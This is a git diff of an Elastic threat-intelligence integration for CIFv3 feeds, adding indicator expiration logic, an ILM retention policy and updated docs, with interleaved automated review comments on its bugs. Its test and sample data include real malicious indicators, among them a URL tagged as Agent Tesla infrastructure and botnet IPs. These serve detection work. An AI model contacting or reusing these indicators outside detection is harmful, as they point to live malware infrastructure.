"http://208.67.106.111/theme/inc/e26dbe0dcc481e.php", "uuid": "3fbdd654-b2b0-498c-8e20-ef87bce73672" 
@@ -34,13 +37,14 @@ "indicator": { "confidence": "High", "description": "agent tesla", - "first_seen": "2022-07-19T07:40:41.000000Z", + "first_seen": "2022-07-19T07:40:41.000Z", "ip": "89.160.20.156", - "last_seen": "2022-07-19T08:35:05.971696Z", + "last_seen": "2022-07-19T08:35:05.971Z", "marking": { "tlp": "WHITE" }, "modified_at": "2022-07-19T08:35:05.971696Z", + "name": "89.160.20.156", "provider": "threatfox.abuse.ch", "reference": "https://threatfox.abuse.ch/ioc/838651/", "sightings": 1, diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/system/test-default-config.yml b/packages/ti_cif3/data_stream/feed/_dev/test/system/test-default-config.yml index 0f55f1388f6..4ef21b61607 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/system/test-default-config.yml +++ b/packages/ti_cif3/data_stream/feed/_dev/test/system/test-default-config.yml @@ -10,3 +10,6 @@ data_stream: type: ipv4 cif_tags: 'botnet,exploit,malware,phishing' enable_request_tracer: true + ioc_expiration_duration: 10d +assert: + hit_count: 6 diff --git a/packages/ti_cif3/data_stream/feed/agent/stream/httpjson.yml.hbs b/packages/ti_cif3/data_stream/feed/agent/stream/httpjson.yml.hbs index 799a95c2188..25d6a5ffd9f 100644 --- a/packages/ti_cif3/data_stream/feed/agent/stream/httpjson.yml.hbs +++ b/packages/ti_cif3/data_stream/feed/agent/stream/httpjson.yml.hbs @@ -75,6 +75,13 @@ cursor: last_requested_at: value: '[[ formatDate (now) "RFC3339" ]]' +{{#if ioc_expiration_duration}} +fields_under_root: true +fields: + _conf: + ioc_expiration_duration: "{{ioc_expiration_duration}}" +{{/if}} + tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_cif3/data_stream/feed/elasticsearch/ilm/default_policy.json b/packages/ti_cif3/data_stream/feed/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..68d2c5e57a6 --- /dev/null +++ b/packages/ti_cif3/data_stream/feed/elasticsearch/ilm/default_policy.json 
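Review bot: The `_conf` object injected in the `httpjson.yml.hbs` hunk is a pipeline-internal carrier (the ingest pipeline reads `_conf.ioc_expiration_duration` and drops `_conf` in its final `remove` processor), but nothing in the template says so, and the `{{#if ioc_expiration_duration}}` guard is redundant given the variable is `required: true` with a `730d` default in the data stream manifest. A handlebars comment above the block, `{{! _conf.* is consumed and removed by the ingest pipeline; it is never indexed }}`, would stop a later maintainer from treating it as a user-facing field. The user value is placed unescaped inside a double-quoted YAML scalar, so a stray `"` would break the rendered input config; the pipeline script only inspects the trailing unit character, so nothing upstream rejects such a value. If the template already declares `fields` or `fields_under_root` elsewhere (not visible in this hunk), the new block would produce a duplicate YAML key.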
@@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + }, + "delete": { + "min_age": "3d", + "actions": { + "delete": {} + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_cif3/data_stream/feed/elasticsearch/ingest_pipeline/default.yml b/packages/ti_cif3/data_stream/feed/elasticsearch/ingest_pipeline/default.yml index 1a1610e0cc9..64a2ba8a997 100644 --- a/packages/ti_cif3/data_stream/feed/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_cif3/data_stream/feed/elasticsearch/ingest_pipeline/default.yml @@ -31,14 +31,32 @@ processors: ##################### # Threat ECS Fields # ##################### - - rename: + - date: field: cif3.firsttime target_field: threat.indicator.first_seen - ignore_missing: true - - rename: + tag: date-indicator_first_seen + formats: + - "ISO8601" + if: ctx.cif3?.firsttime != null + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}}' + - date: field: cif3.lasttime target_field: threat.indicator.last_seen - ignore_missing: true + tag: date-indicator_last_seen + formats: + - "ISO8601" + if: ctx.cif3?.lasttime != null + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}}' + - set: + field: threat.indicator.name + copy_from: cif3.indicator + if: ctx.cif3?.indicator != null - rename: field: cif3.reporttime target_field: threat.indicator.modified_at 
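Review bot: `delete.min_age: 3d` is measured from rollover, and rollover fires on `max_age: 2d` or `max_size: 50gb`, so the `5 days` quoted in both README hunks of this commit is an upper bound rather than a fixed retention: a feed that reaches 50 GB before two days rolls over early and those documents are deleted sooner. The companion `lifecycle.yml` adds `data_retention: "5d"` for data-stream-lifecycle managed streams, so the two mechanisms encode the same intent in different terms and need to be changed together. JSON carries no comments, so the derivation belongs in the README sentence, e.g. `Source indices are deleted 3 days after rollover (rollover at 2 days or 50 GB), i.e. at most 5 days after ingestion.`. The file is also missing its trailing newline.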
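Review bot: The `on_failure` messages on the two new `date` processors (`date-indicator_first_seen`, `date-indicator_last_seen`) omit `{{{_ingest.on_failure_message}}}`, whereas the `script-default-deleted_at` and `date_deleted_at` processors added further down this file include `failed with message: {{{_ingest.on_failure_message}}}`, and the script one uses `{{{_ingest.pipeline}}}` where every other processor uses `{{{_ingest.on_failure_pipeline}}}`. Without the failure message an unparseable `firsttime`/`lasttime` only records which processor failed, not why, which is what an operator needs when a feed changes its timestamp format. Use the one longer form everywhere: `value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'`.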
@@ -69,21 +87,21 @@ processors: - set: field: threat.indicator.type value: file - if: "['md5', 'sha1', 'sha256', 'sha512', 'ssdeep'].contains(ctx.cif3?.itype) && !ctx.cif3?.tags.contains('ja3')" + if: "ctx.cif3?.tags?.contains('ja3') != true && ['md5', 'sha1', 'sha256', 'sha512', 'ssdeep'].contains(ctx.cif3?.itype)" - rename: field: cif3.indicator target_field: threat.indicator.tls.client.ja3 ignore_missing: true - if: "ctx.cif3?.itype == 'md5' && ctx.cif3?.tags.contains('ja3')" + if: "ctx.cif3?.itype == 'md5' && ctx.cif3?.tags?.contains('ja3') == true" - rename: field: cif3.indicator target_field: threat.indicator.file.pe.imphash ignore_missing: true - if: "ctx.cif3?.itype == 'md5' && ctx.cif3?.tags.contains('imphash')" + if: "ctx.cif3?.itype == 'md5' && ctx.cif3?.tags?.contains('imphash') == true" - append: field: related.hash value: "{{{ threat.indicator.file.hash.pe.imphash }}}" - if: ctx?.threat?.indicator?.file?.pe?.imphash != null + if: ctx.threat?.indicator?.file?.pe?.imphash != null - rename: field: cif3.indicator target_field: _tmp.hashvalue 
@@ -124,13 +142,13 @@ processors: field: cif3.indicator target_field: threat.indicator.network.cidr ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && (ctx.cif3?.indicator_ipv4_mask != null || ctx.cif3?.indicator_ipv6_mask != null)" + if: "(ctx.cif3?.indicator_ipv4_mask != null || ctx.cif3?.indicator_ipv6_mask != null) && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - convert: field: cif3.indicator type: ip target_field: threat.indicator.ip ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.indicator_ipv4_mask == null && ctx.cif3?.indicator_ipv6_mask == null" + if: "ctx.cif3?.indicator_ipv4_mask == null && ctx.cif3?.indicator_ipv6_mask == null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - append: field: related.ip value: "{{{ threat.indicator.ip }}}" 
@@ -139,37 +157,37 @@ processors: field: cif3.cc target_field: threat.indicator.geo.country_iso_code ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.cc != null" + if: "ctx.cif3?.cc != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.asn target_field: threat.indicator.as.number ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.asn != null" + if: "ctx.cif3?.asn != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.asn_desc target_field: threat.indicator.as.organization.name ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.asn_desc != null" + if: "ctx.cif3?.asn_desc != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.latitude target_field: threat.indicator.geo.location.lat ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.latitude != null" + if: "ctx.cif3?.latitude != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.longitude target_field: threat.indicator.geo.location.lon ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.longitude != null" + if: "ctx.cif3?.longitude != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.region target_field: threat.indicator.geo.region_name ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.region != null" + if: "ctx.cif3?.region != null && ['ipv4-addr', 
'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.timezone target_field: threat.indicator.geo.timezone ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.timezone != null" + if: "ctx.cif3?.timezone != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" ## URL indicator operations - set: @@ -225,7 +243,7 @@ processors: - append: field: related.hosts value: "{{{ threat.indicator.url.domain }}}" - if: ctx?.threat?.indicator?.url?.domain != null + if: ctx.threat?.indicator?.url?.domain != null ###################### # Confidence # 
@@ -281,14 +299,86 @@ processors: # sometimes contains a range like 1000-1002 or CSVs like 10,22,52 ignore_failure: true if: ctx.cif3?.port != null - - ###################### - # Cleanup processors # - ###################### - set: field: threat.indicator.type value: unknown if: ctx.threat?.indicator?.type == null + + ################### + # IOC Expiration # + ################### + - script: + lang: painless + tag: script-default-deleted_at + if: ctx.cif3?.deleted_at == null && ctx._conf?.ioc_expiration_duration != null && ctx._conf.ioc_expiration_duration != '' + description: Indicator Expiration is done after - `45d` for IP, `90d` for domain, `365d` for URL, Hash. For all other indicators after `_conf.ioc_expiration_duration` (default 730d) since their lasttime. This script adds a default `cif3.deleted_at` field to allow indicator expiration. + source: > + ZonedDateTime _tmp_deleted_at; + ZonedDateTime _tmp_lasttime_at; + if (ctx.threat.indicator.last_seen != null) { + _tmp_lasttime_at = ZonedDateTime.parse(ctx.threat.indicator.last_seen); + } + else { + _tmp_lasttime_at = ZonedDateTime.parse(ctx.threat.indicator.first_seen); + } + if (ctx.threat.indicator.type == 'ipv4-addr' || ctx.threat.indicator.type == 'ipv6-addr') { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(45L); + ctx.cif3.expiration_duration = "45d"; + } else if (ctx.threat.indicator.type == 'domain-name') { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(90L); + ctx.cif3.expiration_duration = "90d"; + } else if (ctx.threat.indicator.type == 'url' || ctx.threat.indicator.type == 'file') { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(365L); + ctx.cif3.expiration_duration = "365d"; + } else { + def dur = ctx._conf.ioc_expiration_duration; + ctx.cif3.expiration_duration = ctx._conf.ioc_expiration_duration; + if (dur instanceof String){ + String time_unit = dur.substring(dur.length() - 1, dur.length()); + String time_value = dur.substring(0, dur.length() - 1); + if (time_unit == 'd') { + _tmp_deleted_at = 
_tmp_lasttime_at.plusDays(Long.parseLong(time_value)); + } else if (time_unit == 'h') { + _tmp_deleted_at = _tmp_lasttime_at.plusHours(Long.parseLong(time_value)); + } else if (time_unit == 'm') { + _tmp_deleted_at = _tmp_lasttime_at.plusMinutes(Long.parseLong(time_value)); + } else { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(90L); + if (ctx.error == null) { + ctx.error = new HashMap(); + } + if (ctx.error.message == null) { + ctx.error.message = new ArrayList(); + } + ctx.error.message.add('invalid ioc_expiration_duration: using default 90 days'); + } + } + } + ctx.cif3.deleted_at = _tmp_deleted_at; + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: cif3.deleted_at + tag: date_deleted_at + target_field: cif3.deleted_at + formats: + - ISO8601 + - UNIX + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: _conf.ioc_expiration_duration + tag: rename_conf_ioc_expiration_duration + target_field: cif3.expiration_duration + if: ctx.cif3?.expiration_duration == null + + ###################### + # Cleanup processors # + ###################### - script: lang: painless if: ctx.cif3 != null @@ -319,12 +409,11 @@ processors: if: "ctx.cif3?.rdata == ''" - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags?.contains('preserve_original_event') != true" ignore_failure: true ignore_missing: true - remove: field: - - cif3.indicator - cif3.confidence - cif3.indicator_ipv4 - cif3.indicator_ipv6 
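Review bot: The `date_deleted_at` processor has neither an `if` nor `ignore_missing`, but the script that creates `cif3.deleted_at` is skipped whenever `_conf.ioc_expiration_duration` is null or empty, so in that case every document collects an `error.message` entry from a processor that had nothing to convert; guard it with `if: ctx.cif3?.deleted_at != null`. In the same script the fallback for an unrecognised unit is `plusDays(90L)` and the appended message says `using default 90 days`, while the manifest default and the processor's own `description` say `730d`, so one of the two should change to make documentation and behaviour agree. That fallback branch also leaves `cif3.expiration_duration` set to the rejected input string, so the stored duration no longer matches the computed `deleted_at`; assigning `ctx.cif3.expiration_duration = "90d";` next to the fallback keeps them consistent. The unit check only accepts lowercase `d`, `h`, `m`, so a value such as `30D` silently takes the fallback path, and a negative value such as `-5d` parses and yields a `deleted_at` in the past. When `_conf` is absent the hard-coded 45/90/365-day rules never run either, because the script's `if` requires the config value even for indicator types that do not use it; presumably acceptable while the manifest makes the variable required, but worth a comment on the condition.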
@@ -336,8 +425,11 @@ processors: - cif3.region - cif3.tags - cif3.tlp + - cif3.firsttime + - cif3.lasttime - message - _tmp + - _conf ignore_missing: true if: ctx.threat?.indicator?.type != null on_failure: diff --git a/packages/ti_cif3/data_stream/feed/fields/ecs.yml b/packages/ti_cif3/data_stream/feed/fields/ecs.yml index ef9d73ddd42..18abb0a68db 100644 --- a/packages/ti_cif3/data_stream/feed/fields/ecs.yml +++ b/packages/ti_cif3/data_stream/feed/fields/ecs.yml @@ -10,6 +10,8 @@ name: related.hash - external: ecs name: related.ip +- external: ecs + name: related.hosts - external: ecs name: event.created - external: ecs @@ -98,3 +100,7 @@ name: threat.indicator.geo.region_name - external: ecs name: threat.indicator.geo.timezone +- external: ecs + name: threat.indicator.name +- external: ecs + name: labels diff --git a/packages/ti_cif3/data_stream/feed/fields/fields.yml b/packages/ti_cif3/data_stream/feed/fields/fields.yml index 4977ea2d804..5302be91e98 100644 --- a/packages/ti_cif3/data_stream/feed/fields/fields.yml +++ b/packages/ti_cif3/data_stream/feed/fields/fields.yml @@ -104,3 +104,15 @@ - name: indicator_ssdeep_double_chunk type: text description: SSDEEP hash double chunk. + - name: deleted_at + type: date + description: | + The indicator expiration timestamp. + - name: expiration_duration + type: keyword + description: | + The configured expiration duration. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: "true" + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_cif3/data_stream/feed/lifecycle.yml b/packages/ti_cif3/data_stream/feed/lifecycle.yml new file mode 100644 index 00000000000..5a4af9095b7 --- /dev/null +++ b/packages/ti_cif3/data_stream/feed/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "5d" 
diff --git a/packages/ti_cif3/data_stream/feed/manifest.yml b/packages/ti_cif3/data_stream/feed/manifest.yml index 27632206134..9cea30af8f9 100644 --- a/packages/ti_cif3/data_stream/feed/manifest.yml +++ b/packages/ti_cif3/data_stream/feed/manifest.yml @@ -1,5 +1,6 @@ title: "CIFv3 Feed" type: logs +ilm_policy: logs-ti_cif3.feed-default_policy streams: - input: httpjson template_path: httpjson.yml.hbs @@ -69,6 +70,15 @@ streams: # default: |- # #tlp: white # description: "Optional REST API Feed filters supported by [CIFv3](https://github.com/csirtgadgets/bearded-avenger/blob/master/cif/httpd/common.py#L7-L9)." + - name: ioc_expiration_duration + type: text + title: IOC Expiration Duration + multi: false + required: true + show_user: true + default: "730d" + description: >- + Enforces all IOCs to expire after this duration since their report time indicated in the feed. Use [Elasticsearch time units](https://www.elastic.co/guide/en/elasticsearch/reference/current/api-conventions.html#time-units) in days, hours, or minutes (e.g 90d) - name: ssl type: yaml title: SSL diff --git a/packages/ti_cif3/data_stream/feed/sample_event.json b/packages/ti_cif3/data_stream/feed/sample_event.json index 0ec10cfc672..17073fd0730 100755 --- a/packages/ti_cif3/data_stream/feed/sample_event.json +++ b/packages/ti_cif3/data_stream/feed/sample_event.json @@ -1,13 +1,16 @@ { - "@timestamp": "2023-08-08T18:44:20.288Z", + "@timestamp": "2024-04-10T04:46:58.281Z", "agent": { - "ephemeral_id": "01cfb0f6-6879-48c3-a90f-2f8c5274de1f", - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "ephemeral_id": "94c530db-5c8f-407c-939b-cd1d21d547fc", + "id": "28f0e936-c71c-4f75-8919-506fed4d20e7", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "cif3": { + "deleted_at": "2022-09-03T20:25:53.000Z", + "expiration_duration": "45d", + "indicator": "20.206.75.106", "itype": "ipv4", "portlist": "443", "uuid": "ac240898-1443-4d7e-a98a-1daed220c162" 
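Review bot: The new `ioc_expiration_duration` description says the duration is counted `since their report time indicated in the feed`, but the pipeline script computes `deleted_at` from `threat.indicator.last_seen` (the feed's `lasttime`) and falls back to `first_seen`; `reporttime` is renamed to `modified_at` and is not consulted. The description also links to the full Elasticsearch time-units page, while the script understands only lowercase `d`, `h` and `m` suffixes and falls back to 90 days for anything else. Suggested wording: `Enforces all IOCs to expire after this duration since their last-seen time (first-seen if absent) in the feed. Accepts a number followed by d (days), h (hours) or m (minutes), e.g. 90d.`. The `ilm_policy` line added at the top of this file refers to the `elasticsearch/ilm/default_policy.json` introduced in the same commit.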
@@ -21,18 +24,18 @@
 "version": "8.11.0"
 },
 "elastic_agent": {
- "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e",
+ "id": "28f0e936-c71c-4f75-8919-506fed4d20e7",
 "snapshot": false,
- "version": "8.9.0"
+ "version": "8.12.1"
 },
 "event": {
 "agent_id_status": "verified",
 "category": [
 "threat"
 ],
- "created": "2023-08-08T18:44:20.288Z",
+ "created": "2024-04-10T04:46:58.281Z",
 "dataset": "ti_cif3.feed",
- "ingested": "2023-08-08T18:44:23Z",
+ "ingested": "2024-04-10T04:47:10Z",
 "kind": "enrichment",
 "original": "{\"application\":\"https\",\"asn\":8075,\"asn_desc\":\"microsoft-corp-msn-as-block\",\"cc\":\"br\",\"city\":\"campinas\",\"confidence\":10,\"count\":1,\"firsttime\":\"2022-07-20T20:25:53.000000Z\",\"group\":[\"everyone\"],\"indicator\":\"20.206.75.106\",\"indicator_ipv4\":\"20.206.75.106\",\"itype\":\"ipv4\",\"lasttime\":\"2022-07-20T20:25:53.000000Z\",\"latitude\":-22.9035,\"location\":[-47.0565,-22.9035],\"longitude\":-47.0565,\"portlist\":\"443\",\"protocol\":\"tcp\",\"provider\":\"sslbl.abuse.ch\",\"reference\":\"https://sslbl.abuse.ch/blacklist/sslipblacklist.csv\",\"region\":\"sao paulo\",\"reporttime\":\"2022-07-21T20:33:26.585967Z\",\"tags\":[\"botnet\"],\"timezone\":\"america/sao_paulo\",\"tlp\":\"white\",\"uuid\":\"ac240898-1443-4d7e-a98a-1daed220c162\"}",
 "type": [
@@ -66,7 +69,7 @@
 }
 },
 "confidence": "High",
- "first_seen": "2022-07-20T20:25:53.000000Z",
+ "first_seen": "2022-07-20T20:25:53.000Z",
 "geo": {
 "country_iso_code": "br",
 "location": {
@@ -77,15 +80,16 @@
 "timezone": "america/sao_paulo"
 },
 "ip": "20.206.75.106",
- "last_seen": "2022-07-20T20:25:53.000000Z",
+ "last_seen": "2022-07-20T20:25:53.000Z",
 "marking": {
 "tlp": "WHITE"
 },
 "modified_at": "2022-07-21T20:33:26.585967Z",
+ "name": "20.206.75.106",
 "provider": "sslbl.abuse.ch",
 "reference": "https://sslbl.abuse.ch/blacklist/sslipblacklist.csv",
 "sightings": 1,
 "type": "ipv4-addr"
 }
 }
-}
+}
\ No newline at end of file
diff --git a/packages/ti_cif3/docs/README.md b/packages/ti_cif3/docs/README.md index 70e2d6fd422..666dae4a399 100644 --- a/packages/ti_cif3/docs/README.md +++ b/packages/ti_cif3/docs/README.md @@ -2,6 +2,21 @@ This integration connects with the [REST API from the running CIFv3 instance](https://github.com/csirtgadgets/bearded-avenger-deploymentkit/wiki/REST-API) to retrieve indicators. +## Expiration of Indicators of Compromise (IOCs) +Indicators are expired after a certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created for a source index to allow only active indicators to be available to the end users. The transform creates a destination index named `logs-ti_cif3_latest.dest_feed*` which only contains active and unexpired indicators. Destination indices are aliased to `logs-ti_cif3_latest.feed`. The indicator match rules and dashboards are updated to show only active indicators. + +| Indicator Type | Indicator Expiration Duration | +|:------------------|:------------------------------------------------| +| `ipv4-addr` | `45d` | +| `ipv6-addr` | `45d` | +| `domain-name` | `90d` | +| `url` | `365d` | +| `file` | `365d` | +| All Other Types | Derived from `IOC Expiration Duration` setting | + +### ILM Policy +To facilitate IOC expiration, source datastream-backed indices `.ds-logs-ti_cif3.feed-*` are allowed to contain duplicates. ILM policy `logs-ti_cif3.feed-default_policy` is added to these source indices so it doesn't lead to unbounded growth. This means data in these source indices will be deleted after `5 days` from ingested date. + ## Data Streams ### Feed 
@@ -29,7 +44,9 @@ CIFv3 `confidence` field values (0..10) are converted to ECS confidence (None, L
 | cif3.city | GeoIP city information. | keyword |
 | cif3.confidence | The confidence on a scale of 0-10 that the tags appropriately contextualize the indicator. | float |
 | cif3.count | The number of times the same indicator has been reported with the same metadata by the same provider. | integer |
+| cif3.deleted_at | The indicator expiration timestamp. | date |
 | cif3.description | A description of the indicator. | keyword |
+| cif3.expiration_duration | The configured expiration duration. | keyword |
 | cif3.indicator | The value of the indicator, for example if the type is fqdn, this would be the value. | keyword |
 | cif3.indicator_iprange | IPv4 or IPv6 IP Range. | ip_range |
 | cif3.indicator_ipv4 | IPv4 address. | ip |
@@ -67,6 +84,8 @@ CIFv3 `confidence` field values (0..10) are converted to ECS confidence (None, L
 | event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword |
 | event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword |
 | input.type | Type of Filebeat input. | keyword |
+| labels | Custom key/value pairs. Can be used to add meta information to events. Should not contain nested objects. All values are stored as keyword. Example: `docker` and `k8s` labels. | object |
+| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword |
 | log.file.path | Path to the log file. | keyword |
 | log.flags | Flags for the log file. | keyword |
 | log.offset | Offset of the entry in the log file. | long |
@@ -74,6 +93,7 @@ CIFv3 `confidence` field values (0..10) are converted to ECS confidence (None, L
 | network.protocol | In the OSI Model this would be the Application Layer protocol. For example, `http`, `dns`, or `ssh`. The field value must be normalized to lowercase for querying. | keyword |
 | network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword |
 | related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword |
+| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword |
 | related.ip | All of the IPs seen on your event. | ip |
 | tags | List of keywords used to tag each event. | keyword |
 | threat.feed.name | Display friendly feed name | constant_keyword |
@@ -99,6 +119,7 @@ CIFv3 `confidence` field values (0..10) are converted to ECS confidence (None, L | threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | | threat.indicator.marking.tlp | Traffic Light Protocol sharing markings. | keyword | | threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | | threat.indicator.provider | The name of the indicator's provider. | keyword | | threat.indicator.reference | Reference URL linking to additional information about this indicator. | keyword | | threat.indicator.sightings | Number of times this indicator was observed conducting threat activity. | long | @@ -120,15 +141,18 @@ An example event for `feed` looks as following: ```json { - "@timestamp": "2023-08-08T18:44:20.288Z", + "@timestamp": "2024-04-10T04:46:58.281Z", "agent": { - "ephemeral_id": "01cfb0f6-6879-48c3-a90f-2f8c5274de1f", - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "ephemeral_id": "94c530db-5c8f-407c-939b-cd1d21d547fc", + "id": "28f0e936-c71c-4f75-8919-506fed4d20e7", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "cif3": { + "deleted_at": "2022-09-03T20:25:53.000Z", + "expiration_duration": "45d", + "indicator": "20.206.75.106", "itype": "ipv4", "portlist": "443", "uuid": "ac240898-1443-4d7e-a98a-1daed220c162" 
@@ -142,18 +166,18 @@ An example event for `feed` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "id": "28f0e936-c71c-4f75-8919-506fed4d20e7", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-08-08T18:44:20.288Z", + "created": "2024-04-10T04:46:58.281Z", "dataset": "ti_cif3.feed", - "ingested": "2023-08-08T18:44:23Z", + "ingested": "2024-04-10T04:47:10Z", "kind": "enrichment", "original": "{\"application\":\"https\",\"asn\":8075,\"asn_desc\":\"microsoft-corp-msn-as-block\",\"cc\":\"br\",\"city\":\"campinas\",\"confidence\":10,\"count\":1,\"firsttime\":\"2022-07-20T20:25:53.000000Z\",\"group\":[\"everyone\"],\"indicator\":\"20.206.75.106\",\"indicator_ipv4\":\"20.206.75.106\",\"itype\":\"ipv4\",\"lasttime\":\"2022-07-20T20:25:53.000000Z\",\"latitude\":-22.9035,\"location\":[-47.0565,-22.9035],\"longitude\":-47.0565,\"portlist\":\"443\",\"protocol\":\"tcp\",\"provider\":\"sslbl.abuse.ch\",\"reference\":\"https://sslbl.abuse.ch/blacklist/sslipblacklist.csv\",\"region\":\"sao paulo\",\"reporttime\":\"2022-07-21T20:33:26.585967Z\",\"tags\":[\"botnet\"],\"timezone\":\"america/sao_paulo\",\"tlp\":\"white\",\"uuid\":\"ac240898-1443-4d7e-a98a-1daed220c162\"}", "type": [ @@ -187,7 +211,7 @@ An example event for `feed` looks as following: } }, "confidence": "High", - "first_seen": "2022-07-20T20:25:53.000000Z", + "first_seen": "2022-07-20T20:25:53.000Z", "geo": { "country_iso_code": "br", "location": { 
@@ -198,11 +222,12 @@ An example event for `feed` looks as following:
 "timezone": "america/sao_paulo"
 },
 "ip": "20.206.75.106",
- "last_seen": "2022-07-20T20:25:53.000000Z",
+ "last_seen": "2022-07-20T20:25:53.000Z",
 "marking": {
 "tlp": "WHITE"
 },
 "modified_at": "2022-07-21T20:33:26.585967Z",
+ "name": "20.206.75.106",
 "provider": "sslbl.abuse.ch",
 "reference": "https://sslbl.abuse.ch/blacklist/sslipblacklist.csv",
 "sightings": 1,
@@ -210,5 +235,4 @@ An example event for `feed` looks as following:
 }
 }
 }
-
 ```
diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/base-fields.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/base-fields.yml
new file mode 100644
index 00000000000..4b8c057a9ae
--- /dev/null
+++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/base-fields.yml
@@ -0,0 +1,24 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
